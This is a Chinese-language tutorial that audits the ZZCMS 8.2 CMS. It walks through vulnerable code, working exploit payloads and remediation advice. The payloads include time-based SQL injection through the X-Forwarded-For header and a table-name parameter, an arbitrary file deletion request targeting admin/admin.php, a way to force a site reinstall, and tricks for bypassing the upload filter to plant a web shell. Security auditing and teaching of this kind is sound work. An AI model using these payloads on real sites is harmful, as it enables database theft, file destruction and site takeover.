ZZCMS 8.2 代码审计与漏洞分析教学文档<\/h1>

一、审计工具与环境准备<\/h2>

审计工具<\/strong>：使用Seay源代码审计系统<\/p>

支持自动审计功能<\/li>
提供全局定位搜索功能<\/li>
可生成扫描报告<\/li> <\/ul> <\/li>

审计流程<\/strong>：<\/p>

导入项目源码<\/li>
执行自动审计<\/li>
分析扫描结果<\/li>
重点验证可疑漏洞点<\/li> <\/ul> <\/li> <\/ol>
二、SQL注入漏洞分析<\/h2>
1. 基于IP伪造的SQL注入<\/h3>
漏洞文件<\/strong>：\/user\/check.php<\/code><\/p>
漏洞代码<\/strong>：<\/p>
query<\/span>("UPDATE zzcms_user SET loginip = '"<\/span>.<\/span>getip<\/span>().<\/span>"' WHERE username='"<\/span>.<\/span>$username.<\/span>"'"<\/span>); <\/span><\/span><\/code><\/pre>漏洞分析<\/strong>：<\/p> getip()<\/code>函数从多个HTTP头获取IP地址（HTTP_CLIENT_IP、HTTP_X_FORWARDED_FOR等）<\/li> 未对IP地址进行过滤处理<\/li> 攻击者可伪造恶意IP构造SQL注入<\/li> <\/ul> 利用方法<\/strong>：<\/p> X-Forwarded-For: 1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)-- <\/span><\/span><\/span><\/code><\/pre>2. 表名直接拼接导致的SQL注入<\/h3> 漏洞文件<\/strong>：\/user\/del.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> if<\/span> (strpos<\/span>($id,","<\/span>)><\/span>0<\/span>) <\/span><\/span> $sql=<\/span>"select id,editor from "<\/span>.<\/span>$tablename.<\/span>" where id in ("<\/span>.<\/span> $id .<\/span>")"<\/span>; <\/span><\/span>else<\/span> <\/span><\/span> $sql=<\/span>"select id,editor from "<\/span>.<\/span>$tablename.<\/span>" where id ='<\/span>$id<\/span>'"<\/span>; <\/span><\/span><\/code><\/pre>漏洞分析<\/strong>：<\/p> $tablename<\/code>变量直接从POST获取<\/li> 未进行任何过滤直接拼接进SQL语句<\/li> 可构造恶意表名实现注入<\/li> <\/ul> 改进的Payload<\/strong>：<\/p> id=1&tablename=zzcms_answer where id=999999999 union select 1,2 and if((ascii(substr(user(),1,1)) = 114),sleep(3),1)# <\/code><\/pre> 三、任意文件删除漏洞<\/h2> 1. 广告管理模块文件删除<\/h3> 漏洞文件<\/strong>：\/user\/adv.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> if<\/span> ($oldimg<><\/span>$img){ <\/span><\/span> $f=<\/span>"..\/"<\/span>.<\/span>$oldimg; <\/span><\/span> if<\/span> (file_exists<\/span>($f)){ <\/span><\/span> unlink<\/span>($f); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞分析<\/strong>：<\/p> $oldimg<\/code>变量未过滤..\/<\/code>等路径遍历字符<\/li> 可跨目录删除任意文件<\/li> 需要满足$action=="modify"<\/code>且$img != $oldimg<\/code><\/li> <\/ul> 利用Payload<\/strong>：<\/p> POST<\/span> \/user\/adv.php?action=modify HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>...<\/span> <\/span><\/span>adv=tettste&advlink=\/zt\/show.php?id=1&company=测试&img=test&oldimg=admin\/admin.php <\/span><\/span><\/code><\/pre>2. 其他存在相同漏洞的文件<\/h3> \/user\/licence_save.php<\/code><\/li> \/user\/manage.php<\/code><\/li> \/user\/ppsave.php<\/code><\/li> \/user\/zssave.php<\/code><\/li> <\/ul> 四、网站重装漏洞<\/h2> 漏洞文件<\/strong>：\/install\/step_2.php<\/code>至\/install\/step_6.php<\/code><\/p> 漏洞分析<\/strong>：<\/p> 只有step_1.php<\/code>检查了install.lock<\/code>文件<\/li> 其他步骤文件缺少安装锁定检查<\/li> 可直接访问后续步骤重装系统<\/li> <\/ul> 利用方法<\/strong>：<\/p> POST<\/span> \/install\/index.php HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>...<\/span> <\/span><\/span>step=2 <\/span><\/span><\/code><\/pre>五、反射型XSS漏洞<\/h2> 1. 顶部导航栏XSS<\/h3> 漏洞文件<\/strong>：\/inc\/top.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> if<\/span> (@<\/span>$_POST["action"<\/span>]==<\/span>"search"<\/span>){ <\/span><\/span> echo<\/span> "<script>location.href='"<\/span>.@<\/span>$_POST["lb"<\/span>].<\/span>"\/search.php?keyword="<\/span>.@<\/span>$_POST["keyword"<\/span>].<\/span>"'<\/script>"<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞分析<\/strong>：<\/p> 未包含\/inc\/conn.php<\/code>进行输入过滤<\/li> 直接输出用户控制的lb<\/code>和keyword<\/code>参数<\/li> 可构造恶意输入闭合标签<\/li> <\/ul> 2. 图片上传表单XSS<\/h3> 漏洞文件<\/strong>：\/uploadimg_form.php<\/code> (66-67行)<\/p> 六、文件上传漏洞<\/h2> 漏洞文件<\/strong>：\/uploadimg.php<\/code><\/p> 漏洞分析<\/strong>：<\/p> 检查流程：<\/p> 检查文件是否存在<\/li> 检查文件大小<\/li> 检查MIME类型（可被GIF89a绕过）<\/li> 黑名单检查后缀（php\/asp\/jsp）<\/li> <\/ul> <\/li> 绕过方法：<\/p> 使用.phtml<\/code>后缀（未在黑名单中）<\/li> 使用图片木马（copy命令合并）<\/li> <\/ul> <\/li> <\/ol> 防御缺陷<\/strong>：<\/p> 仅检查第一个点后的后缀（可上传shell.php.jpg<\/code>）<\/li> 黑名单机制不完整<\/li> <\/ul> 七、安全防护机制分析<\/h2> 1. 输入过滤机制<\/h3> 文件<\/strong>：\/inc\/stopsqlin.php<\/code><\/p> 过滤函数<\/strong>：<\/p> function<\/span> zc_check<\/span>($string){ <\/span><\/span> if<\/span>(!<\/span>is_array<\/span>($string)){ <\/span><\/span> if<\/span>(get_magic_quotes_gpc<\/span>()){ <\/span><\/span> return<\/span> htmlspecialchars<\/span>(trim<\/span>($string)); <\/span><\/span> }else<\/span>{ <\/span><\/span> return<\/span> addslashes<\/span>(htmlspecialchars<\/span>(trim<\/span>($string))); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> foreach<\/span>($string as<\/span> $k =><\/span> $v) <\/span><\/span> $string[$k] =<\/span> zc_check<\/span>($v); <\/span><\/span> return<\/span> $string; <\/span><\/span>} <\/span><\/span><\/code><\/pre>过滤方式<\/strong>：<\/p> trim()<\/code>去除空白字符<\/li> htmlspecialchars()<\/code>转义HTML特殊字符<\/li> addslashes()<\/code>转义SQL特殊字符<\/li> <\/ol> 2. SQL关键词过滤<\/h3> 函数<\/strong>：<\/p> function<\/span> nostr<\/span>($str){ <\/span><\/span> $sql_injdata =<\/span> "select|insert|update|delete|'|\/*|*\/|..\/|.\/|union|into|load_file|outfile"<\/span>; <\/span><\/span> $sql_inj =<\/span> explode<\/span>("|"<\/span>,$sql_injdata); <\/span><\/span> for<\/span> ($i=<\/span>0<\/span>; $i<<\/span> count<\/span>($sql_inj);$i++<\/span>){ <\/span><\/span> if<\/span> (@<\/span>strpos<\/span>($str,$sql_inj[$i])!==<\/span>false<\/span>){ <\/span><\/span> showmsg<\/span> ("含有非法字符 ["<\/span>.<\/span>$sql_inj[$i].<\/span>"] 返回重填"<\/span>); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> return<\/span> $str; <\/span><\/span>} <\/span><\/span><\/code><\/pre>缺陷<\/strong>：<\/p> 过滤不完整（缺少sleep、benchmark等关键词）<\/li> 大小写可绕过<\/li> 可使用编码\/注释绕过<\/li> <\/ul> 八、防御建议<\/h2> SQL注入防御<\/strong>：<\/p> 使用预处理语句<\/li> 完善过滤函数的关键词列表<\/li> 对表名、字段名等使用白名单校验<\/li> <\/ul> <\/li> 文件操作防御<\/strong>：<\/p> 限制文件路径范围<\/li> 过滤..\/<\/code>等路径遍历字符<\/li> 使用basename()<\/code>获取文件名<\/li> <\/ul> <\/li> XSS防御<\/strong>：<\/p> 统一输入过滤机制<\/li> 在输出时进行HTML编码<\/li> 设置CSP策略<\/li> <\/ul> <\/li> 文件上传防御<\/strong>：<\/p> 使用白名单校验文件后缀<\/li> 检查文件内容而非仅扩展名<\/li> 上传后重命名文件<\/li> <\/ul> <\/li> 安装流程防御<\/strong>：<\/p> 所有安装步骤都检查install.lock<\/li> 安装完成后删除install目录<\/li> <\/ul> <\/li> <\/ol> 九、审计技巧总结<\/h2> 关注用户输入点<\/strong>：<\/p> $_GET<\/code>\/$_POST<\/code>\/$_COOKIE<\/code>\/$_REQUEST<\/code><\/li> 文件上传<\/li> HTTP头（如IP地址）<\/li> <\/ul> <\/li> 追踪数据流向<\/strong>：<\/p> 从输入点到最终使用点<\/li> 特别注意数据库操作、文件操作、命令执行等危险函数<\/li> <\/ul> <\/li> 审计工具辅助<\/strong>：<\/p> 使用自动审计工具快速定位可疑点<\/li> 利用全局搜索追踪变量和函数<\/li> <\/ul> <\/li> 验证漏洞时注意<\/strong>：<\/p> 实际环境测试<\/li> 考虑过滤规则的绕过方法<\/li> 构造最小化PoC<\/li> <\/ul> <\/li> 学习资源推荐<\/strong>：<\/p> 《代码审计--企业级Web代码安全架构》<\/li> 各类CMS漏洞分析文章<\/li> OWASP代码审计指南<\/li> <\/ul> <\/li> <\/ol>